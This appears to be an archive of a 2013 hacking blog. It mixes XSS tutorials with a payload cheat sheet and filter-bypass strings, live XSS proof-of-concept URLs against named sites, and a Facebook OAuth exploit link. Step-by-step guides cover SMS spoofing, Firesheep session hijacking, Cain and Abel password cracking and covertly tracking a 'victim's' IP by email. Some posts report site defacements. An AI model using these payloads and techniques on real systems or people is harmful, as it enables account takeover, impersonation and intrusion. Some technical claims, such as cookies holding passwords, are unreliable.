Monday, February 25, 2013

XSS EXPLOITS


Hello friends. These days I am on an XSS rampage.  Since then I got several request from the readers to post a quick article on cross site scriptting. This tutorial will be divided into two parts. In the first part I will cover the basics of XSS and how the attack vector is implemented. In the next tutorial we will discuss some techniques by which we can prevent XSS attacks.



OWASP lists sql injection and XSS as the two most common vulnerabilities in web pages and web apps. We have covered SQL injection quiet extensively so I decided to write on xss.

Cross Site Scripting or XSS  is a web application attack that involves injecting a piece of malicious code into the vulnerable web application/web page. The attacker injects a client side script mainly through the web browser to reach the other users of the particular website. This attack can open several doors for the attacker ranging from session hijacking to entire database compromise.


Reflected or Non-persistent XSS attack
This is the most common form of XSS attack in which the attackers crafts a malicious code and transfers it to the server side either through the HTTP request parameter or through some HTML form submission. A simple Reflected XSS attack looks like this-
<script>alert(‘xss’);</script>                                        (Embedded Script)
<script src=http://hack.com/xss.js></script>           (External script)

Consider this real time example of reflected XSS in action:
XSS vulnerability in Babylon Search
Stored or Persistent XSS attack

This attack is more dangerous and complicated compared to reflected XSS attack. In Stored or persistent XSS attack, the vulnerable script is stored on the target server and is activated once another user clicks on it. For example, consider a forum where the attacker posts a message containing a link to malicious script. Another user when views the message and clicks it, then the script activates and causes respective attack.
The attacker can craft a malicious script like a cookie stealing script of the form <script>alert(document.cookie);</script> and steal victims cookies to perform session hijacking.

DOM based XSS attack
DOM or document object model based XSS attacks tries to exploit the structure of the page in which they reside. The attacker tries to trick the browser to execute the JavaScript or HTML code of his choice. Unlike the other two XSS attacks, DOM based attack takes the advantage of vulnerable javascript which executes directly in the user’s browser.
Consider the following piece of code:


var loc = document.location + '?gotoHomepage=1';
document.write('<a href="' + loc + '">Home</a>');

The javascript variable document.location can easily be compromised by the attacker to pass a malicious javascript as it has no user input filters. A url of the form : http://site.com/index.html?<script>alert(document.cookie)</script>   can be created and passed as the HTTP header and can be executed directly into user’s document. 
Complete Cheat Sheet on XSS:
<html><font color="Red"><b>Pwned</b></font></html>

<script>alert('xss')</script>

"><script>alert('xss')</script>
Bypassing Xss Simple Filteration Without Alteration:
Now we notice, the above script we used for filtration is evolving only a few strings, knowing there are bunch of ways and
strings to inject a malicious request.
It's only filtering '< > /' means leaving hackers with a vast amount of other strings to inject a malicious code.
Now the question is since '<' and '>' are filtered, how we will be able to send a javascript or html code injection?
Well, the answer is quite easy, javascript can be executed using ' and " before the orignal script.
For instance, 
')alert('xss');
This will generate an alert box again on a vulnerable server.
Secondly,
");alert('xss');
This will too generate an alert box on a vulnerable server.


Bypassing Advance Xss Filtration:

Some webmasters filter lot more than this, especially it's filtered on important sites like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will of course just alter the page but what if the filtration is not in javascript, instead is in html or php or even asp.
There's nothing impossible, we will try to get as much info about the filtration as much we can.
Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the beginning or in the end to avoid and abort it, this of course can be bypassed too!

An example can be likely so:

helloworld<script>alert('xss')</script>

The above script will bypass filtration for the server that reads the malicious string in the beginning.

helloworld<script>alert('xss')<script>helloworld

This will bypass filtration on server that reads whether in the beginning or in the end or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use.
Some webmasters also filter the word 'xss' so it's likely to use some other message for making an alert.

<script>alert('hello world')</script>

This will bypass message filtration.

Now we will study some more advance filtration bypass.

Some webmasters just simply define a pattern of a cross-site scripting script that is possibly common.

In this case, I will mention here the full array of strings to inject, bypassing the filtration.

We will suppose injecting in a search form.

victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>


These are a few simple and advanced scripts that can be used to check for XSS vulnerability. There are several automatic tools available as well but I would recommend that you first learn the manual method so that you can clearly understand the attack vector. Later on you can switch to automatic tools. In case you know any other XSS script that is missing in this tutorial then you can add in the comment box and I will update it in this tutorial along with your name

Cross Site Scripting Vulnerability In NDTV

A Security Researcher Vedachala from ICD, has identified Cross site scripting security flaw in one of the famous XSS Vulnerability in NDTV goodtimes website ..NDTV Good Times is the flagship channel of NDTV Lifestyle, part of the NDTV Group
.



POC [Unfixed] :

http://goodtimes.ndtv.com/video/videosearchlisting.aspx?keyword=%22%3E%3Cscript%3Ealert%28%22E-hacking4all%22%29;%3C/script%3E

Recently the researcher also found a xss vulnerability in popular sites like Airtel, ooowebhost,IBN CNN  etc.

India Results website hacked by Pakistan Hacker Hitcher




A Pakistani Hacker known as Hitcher has breached IndiaResults.com - No.1 Indian Portal for Boards & University Exam Results and Educational/Career.

Similar to BRBRAITT site attack, the hacker  defaced the website and published the database contents in the defacement page itself.

The database dump contains the Name, phone nunber , address and other details. There is no password leaked in the dump.

You can see the defacement page here:
http://ser1.indiaresults.com/%2C/
In an email sent to EHN, the hacker provided the database as XLSX sheet.  It seems like the compromised database is the database which stores the Feedback form data.

At the time of press time, we are still able to see the defacement page.  The mirror of the defacement can be found here:
http://www.th3mirror.com/mirror/id/222665/

Sunday, February 24, 2013

HACED WIFI BY ME

HAI FRIENDS GOOD NEWS
FINALLY I HACKED THE WIFI ROUTER WITH WPA SECURITY ENABLED PASSWORD TODAY AFTER A LOT OF STRUGGLE

Worm Attacks | Your Fb Account Can Be Hacked


Facebook currently has 4 worm (virus) Attacks.
These attacks can lead to loss of your personal
information or in worse cases can get your
Facebook Account Hacked
Worm 1 :- If you get a notice of a PHOTO TAG .
Do not open it.
Worm 2 :- If you get a notification that a friend
reported you for offensive behavior etc.. Do
not open it.
Worm 3 Is a Video saying 99% of People can
not watch this for more the 15 Sec. Do not
open it.
Worm 4 :- All Messages from your friends via
chat saying click this link .. Do not open.
All these worms are made to take your
personal information and even to hack your
accounts. The only way to protect yourself
from these is to ignore them and not to click
on them.

Source: Facebook

Friday, February 22, 2013

How researcher Hacked Facebook OAuth To Get Full Permission On Any Facebook Account




A Security Researcher Nir Goldshlager, has discovered a security flaw in Facebook that allowed him to take a full control over any Facebook account.

OAuth is used by Facebook to communicate between Applications and Facebook users, Usally users must allow/accept the application request to access their account before the communication can start. Facebook application might ask for different permissions.

According to researcher, the vulnerability gives a full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos,etc..) over the victim account .

"To make a successful attack, the victim need to use
a Facebook application (Texas Holdem Poker, Diamond Dash, etc..). And these applications only have a basic permissions, We can always change the scope of the application permission and set a new permission but this method not powerfull, Because the victim need to accept the new permissions of the app" Researcher said in his blog.

But researcher discovered that there are built-in Applications(Facebook Messenger) in Facebook that users never need to accept , And this application have a full control on your account.

PoC:


https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token



Wednesday, February 20, 2013

How to send Sms from friends mobile to any number


Today i will tell you how to send anonymous SMS i.e. How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies or simply you want to send free SMS to your friends using their numbers only. So friends read on...

What is SMS Spoofing?
Spoofing is basically mimic of the original i.e. SMS spoofing basically is a technique to send anonymous SMS to any mobile number. By anonymous i mean that we can use any mobile number to send the SMS. 

This is not actually a trick or hack but it's a service that a company is providing but the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we register will be shown to the victim.
Hence we are exploiting the Internal sender ID phone verification feature.

Feature's of SMS spoofing:
  1. Spoofed sms (any mobile number to any mobile number)
  2. 100% anonymous  messages
  3. Worldwide Network (i.e. we can send SMS all over the world)
  4. No advertisements
  5. Instant Delivery of SMS
How to use this Hack? 
1. First of all, register here . This website looks like this . Fill as i shown below:
2. After Registering you will get 25 free credits that means you can send 25 free SMS from any number to any number. For using it again register another mobile and email ID. 25 SMS is the limitation of this trick from one registered number.. Usually people have two to three sims.. I have 4 sims rofl :P...
3.  Now after registering you will receive password on registered mobile number.
4. Now login with that password that you got on mobile.
5. Now go to Send SMS to number . As shown in snapshot below:
6. After entering the details as explained in snapshot above. Click on send.
7. That's all the hack. I know its limited but its awesome...Isn't It..
Warning : Do not use this for any illegal activities

I hope you all have enjoyed it.. Keep visiting friends for more such hacks...

Tuesday, February 19, 2013

Trick to find facebook Profile ID


               In my previous post i have posted about Facebook status update trick in which we use profile id, but what if  person got username. So this is the trick which will let you get profile id of any person who got custom username. Check below image and see how URL of  facebook profile looks before and after custom username.



                  In case of Profile ID before custom username you can easily identify it by looking at Profile URL, But in case of profile with custom username its not same. Below are simple steps to find Profile ID having custom username.
  • Go to the profile you want to find Profile ID
  • That URL will look like this www.facebook.com/username
  • Change that URL to graph.facebook.com/username
  • Then you will get something like below image.

        

   Subscribe below For such more tutorials !!!

Making Nameless Folder In Windows


  

creating nameless folder
In this small tutorial i will show you a smilpe windows trick. Basically you can not make folder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows  operating system.
 
Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
creating nameless folder
  1. Make a Newfolder on desktop or where ever you want.
  2. Right click on this newly created folder and select Rename.
  3. Erase the text showing "New Folder".
  4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
  5. After that leave alt key and Press enter.
  6. Done you just created nameless folder.

Friday, February 15, 2013

BROWSE ANONYMOUSLY

How can I browse anonymously or stay invisible online ? Is these among those questions which bother you for keeping your privacy online. Anonymizers, proxy servers, VPN and VPS are some options that can help you out. All above services are also offered as paid service but for here we will just have our look on free services.
Anonymizers(anonymity server):
Anonymizers are nothing but proxy servers which act as browsers inside browsers for surfing, their advantage is that they digest everything from the page you want to visit and hence can not only protect your privacy but can also prevent you from online malwares. I 'll not recommend you using some specific anonymizer since firewalls block them someday so better visit http://www.proxy4free.com/ which updates list of anonymizers every hour so that you must get a working anonymity server. Alternatively you can use a TOR browser which really guarantees 100% anonymity. Download TOR from http://www.torproject.org/.

Proxy Servers:
Proxy servers needs some manual settings from your internet configurations. Proxy server lift the limitation that anonymizers had of only being used in browser by making proxy IP available for every application that needs internet connection. Visit http://www.proxy-list.org/ for fresh list of proxies.

Alternatively you always have option of using a proxy generating software, following is brief list of proxy software with their download link have your pick.



Please don't ask which is best among them, its hard to say since working of proxy depends upon load on proxy server and it may vary with time. As my personal preference I use TOR and Ultra Surf when need proxy level anonymity. Please don't use transactional type browsing like e-mail, social networking or financial transactions over proxy servers, its not safe and still anyhow you want to use them better not use anything else than TOR.

Virtual Private Network:
VPN's are most trusted way of hiding online even secure than proxy servers and anonymity servers. Following is list of some software that provide free VPN services.
Ultra VPN is one of the most used and most trusted free VPN service of world, if you have problem trusting any other free VPN service better opt this.

The problem with which every VPN suffers it speed and bandwidth penalty. Also they need registration, only usaip can be used without registering by using username and password “demo”. The advantage they have above Anonymizers and proxy servers is that you don't have to bother about transactional browsing.

Virtual Private Server:
Virtual Private Servers are provided by companies in which each concept of running multiple virtual systems on same system is adapted. Though every PC may be residing on same server but for each individual his system acts as completely separate system. These are most reliable source to stay invisible online but are only offered as paid service.

I hope I have covered enough so that you can have your pick. Don't forget to tell us about your views and experience about using above tools. Please note that no matter which tool you use you will have to suffer speed penalty but sorry that is that cheap cost that you have to pay to browse anonymously and stay invisible online.

China Bank Network Website Defaced By Indian Cyb3r D3V!LS


Indian Hacker group named "Indian Cyb3r D3V!LS" has hacked into the China Bank website and defaced the main page of the website(www.bbyinhang.com).

The Bibi bank network independent website, co-founded by a number of financial professionals committed to universal access to financial expertise to help the general public understand the products and services provided by banks, to cultivate rational, smart and confident consumers of financial.

The hacker claimed to have breached the site by exploiting the Remote File Inclusion (RFI) vulnerability.

Hackers claimed to have compromised around 1000 credit card numbers but they are not going to release/misuse the details.

""Chinese Hacker defacing Many Indian government and colleges along with Pakistan hackers.  Don't mess with us we are greater than you.. no respect for your f** security.. " Hacker said.

The Daily Star website hacked by Anonymous hacktivist


Anonymous Hacktivists hacked into The Daily Star website and upload articles with title "Anonymous Continues Struggle For Justice".

According to Daily Start News report, around one hour after admin removed the post, the hacker once again uploaded the same article with different title "Anonymous Steps It Up".

"Anonymous continued its bid for true democracy and freedom today, when they started on a new path to bring to an end the corruption and oppressive regimes of todays governments. In a call for a truely open society Anonymous has started to raise its public profile the world over," The hacker said in the defacement message.

"Anonymous is calling for media transparency on all sides, particularly to do with world-issues such as Iran/Israel and the USA/UK arms deals in the middle east. As with all arguments, there are two sides, and single sided reporting must stop. War criminals should be tried for their crimes and in the case of state sponsored terrorism, the public should be fully aware of the acts governments commit in order to fight their injustice."

Wednesday, February 13, 2013

Setting Video As Desktop Wallpaper


video wallpaper
Ever wanted to set cool videos as your computers Desktop Wallpaper, then you came to right place. Today in this post i will teach you how to set videos as your Desktop Wallpaper with a simple nice little trick and small tool or software that mostly every one has installed on their computer or laptop. This trick works on  Windows Xp as well as it works on windows 7. Go through below post to learn this simple trick.


How to set video as desktop wallpaper ?

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper

   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

What is keylogger ?



        1. What is keylogger ?
         
           You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.


       2. How it can harm you ?
  • It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details etc.
  • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
       3. Types of  keyloggers 

          There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER                                  
 

 SOFTWARE KEYLOGGER
 
                                 
       4. How to Protect yourself from keyloggers ?
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.

Monday, February 11, 2013

How to Hack Facebook account using Wi-Fi?



THIS IS ONLY FOR EDUCATIONAL PURPOSE ( FOR SECURITY AWARENESS ONLY)
E-HACKING IS NOT RESPONSIBLE FOR ANY MISUSING OF THESE TUTORIALS

Recently You mozilla add on namely " FireSheep" is used for hack thousands of email accounts . As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly  within 24 hours.




What is the Special in FireSheep?
 Using FireSheep add on you can control any account without knowing the username and password .   Famous Social Network Facebook is victim of this Firesheep.


How?
The Firesheep uses HTTP Session Hijacking to  gain the username and password.

What is HTTP Session Hijacking?
Attacker use HTTP session Hijacking to steal the cookies from victim.  Cookies are file which contains the password and username .

Using this HTTP Session Hijacking method you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How to use this Firesheep to steal the cookies?
 You will need this requirements:


Step 1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.



Step 2:

Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep


Step 3:

Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

What is Session Hijacking?Bypassing Login using Session Stealing?

Know what is Session?

What is Session Hijacking?
Session Hijacking is Stealing the existing active Session. The main purpose of Session Hijacking is to bypass authentication process and gain unauthorized access to the computer or Website. In simple words , hackers will login as some other client using their Sessions.



TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine

Different Session Hijacking methods:
Session stealing is achieved by following methods

1. Session fixation:
      In this method, the Hacker sets a user's session id to known victim. For example, Hacker will send email to known victim  with a link that contains a particular session id. If the victim followed that link, the hacker can use that session and gain access.


2. Session SideJacking(session Sniffing): 
    In this method, the attacker use packet sniffing to and steal the Session cookie.  In order to prevent this, some websites use SSL(encrypts the session).  but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client.

 Unsecured Hotspots are vulnerable to this type of Session Hijacking. 

3. Client-side attacks (XSS, Malicious JavaScript Codes, Trojans, etc):
        Hacker can steal the Session by running the Malicious Javascript codes in client system.  Usually hackers attack some websites using XSS and insert their own Malicious Javascript codes.

In client point view it is trusted website, he will visit the website.  When victim visit the link , Malicious Javascript will executed.  It will steal the Session cookies and other confidential data.

4. Physical access:
          If the hacker has physical access, it is easy for him to steal the Session.  Usually this will occur in public cafe.  In public cafe , one use login to some websites(facebook, gmail).  A hacker come after victim can steal the session cookies.

What is Session in computer World? Magic Cookies

What is Session?
HTTP communicates with lot of TCP connections, Server should create unique identifer for each Connection.


A Session is a unique identifier that is generated and sent to the client from a server in order to identify the Current Interaction Session.

 
Whenever you visit a webpage or login to website, the server will store the data about you in your system as a cookie.  This cookies will help to identify you.

For example , you are login to Facebook.com.  when you login to your account, a cookie will be generated and stored in your local system.   if you click the logout, cookies will be destroyed.


Software Implementation:
TCP sessions are implemented using Multi threading concept. Whenever session is generated , a new thread will be created.

HTTP sessions are typically not implemented using one thread per session, but by means of a database with information about the state of each session.

Server side web sessions:

The sessions are stored in Server Machine.

Client side web sessions:
Client-side sessions use cookies .  This will reduce the server side storage.

This is best method but there is one drawback.  Sessions stored in client is vulnerable to tampering by the hackers.   This can be overcome by encrypting the session(but hackers are able to decrypt it also).

HTTP session token

The client usually stores and sends the token as an HTTP cookie and/or sends it as a parameter in GET or POST queries.

The reason to use session tokens is that the client only has to handle the identifier. All session data is stored on the server (usually in a database, to which the client does not have direct access) linked to that identifier.
Magic cookie
is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website.

How to track IP address of anyone using email?

In my old posts(find IP using mail, Track IP using image ), i have explained how to track IP address. Today also i am going to explain you advanced method. By using method you can get the IP address,location, timing of victim.


How to track IP address?

step 1:
know what is your victim email id.
For eg:
victimid[@]gmail.com
step 2:
Register an account here: http://www.readnotify.com

step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com

step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.

Saturday, February 9, 2013

Pakistan Domain Registrar PKNIC website Hacked by PAKbugs


Once again Hackers successfully breached the PKNIC website(pknic.net.pk) - a Registrar for Pakistan's .pk domains. The hack was done by a hacker group called PAKbugs.

“thenews.com.pk, jang.com.pk and many others hacked,” ZombiE_KsA, the hacker, said. “More coming, stay tuned,” the hacker said.

The hackers – ZombiE_KsA, Z3r0Byt3, Xploiter and Dr Freak – criticised PKNIC for being unable to fix the vulnerabilities in its DNS servers.

“Here we go again, pknic.net.pk you think you control .pk domains? … You don’t! Today, we are controlling .pk domains,” Hacker said in the defacement page. “After you patched your shitty system, we still owned you,” the message read.

"Here we go again, pknic.net.pk you think you control .pk domains? LOL you don't! today we are controlling .pk domains! " The Hacker said in the defacement page "after you patched your shitty system we still owned you it was perfect security"

Hacker claimed to have dumped 23,000 accounts information belong to government ,news, blogs, forums and other website. They defaced Jang.com.pk, Thenews.com.pk, propakistani.pk.

At the end of defacement, hackers asked the PKNIC to contact PakBugs on their official forum for patching the vulnerability.

This is not the first time the PKNIC is being under cyber attack.  At the end of last year(November),Turkish Hacker group Eboz has breached the PKNIC website and defaced all top websites including Google, Yahoo, Microsoft and more.

Android malware with ability to install Backdoor on Computers


Android malware with ability to install Backdoor on Computers


Kaspersky Lab has revealed a new type of malware that can infect your computer when connected smartphone or tablet. Two such application, Super Clean and DroidCleaner found in Google Play android market. These two are actually same application, just released with two different names.
Android hacked
These applications apparently disguised as a tool to clean memory for the Android operating system but after installing and running it displays a list of all running some processes and then restart the device. Later, in background, the app downloads three files autorun.inf, folder.ico, and svchosts.exe in phone.


When user connect infected android mobile phone to any Windows computer with active Autorun or Autoplay functionality for USB devices, the svchosts.exe file (Backdoor.MSIL.Ssucl.a) is automatically executed on computer. A similar situation may arise in case of SD card.
Android malware with ability to install Backdoor on Computers
Before apps were removed by Google, they may together have been downloaded up to 6000 times. Malicious code then starts capturing the sound instantly from systems microphone and all recorded data is sent to remote servers after encrypting files.
Other than this, the malware is capable of Sending SMS messages, Enabling Wi-Fi, Gathering information about the device, Opening arbitrary links in a browser, Uploading the SD card’s entire contents, Uploading an arbitrary file to the master’s server, Uploading all SMS messages, Deleting all SMS messages, Uploading all the contacts/photos/coordinates from the device to the master.
The attacks are becoming more sophisticated and users, especially those with low knowledge of technology come easily to the hook of cyber criminals.

Thursday, February 7, 2013

WINDOWS XP CRACKING PASSWORD

-: Windows-XP Password Cracking :-


Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process.

Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".

Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel"  


2) Go into the category "Cracker"     it displays all sub-categories under "Cracker" in left panel.


3) Select "LM & NTLM Hashes" from left panel and then click on     symbol, you will be greeted by a window as shown.


4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.


5) Right clicking on any username shows all available options using which we can crack it's password.


6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc.


8) Click on "Start" button.

9) On completion it will reveal the exact password.

Wednesday, February 6, 2013

Non Persistent Cross Scripting Vulnerability

identified a Non persistent Cross Site scripting vulnerability in one of the Leading online jobs search portal, Monster.

Monster is the largest job search engine in the world. Monster has over a million job postings at any time and over 1 million resumes, in the database (2008) and over 63 million job seekers per month. The company employs approximately 5,000 employees in 36 countries.

The Job search field in the Monster India website(jobsearch.monsterindia.com) is found to be vulnerable to the XSS injection.

 http://jobsearch.monsterindia.com/searchresult.html?fts='/><script>alert('E+Hacking+News')</script>&x=0&y=0&mne=&mxe=

The same vulnerability affects the Hong Kong(jobsearch.monster.com.hk) and Gulf(jobsearch.monstergulf.com) branch of the Monster job portal.

Monday, February 4, 2013

CROSS SITE SCRIPTING (XSS)


What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be easy to understand XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)
Disclaimer:
This article is intended for educational purpose only.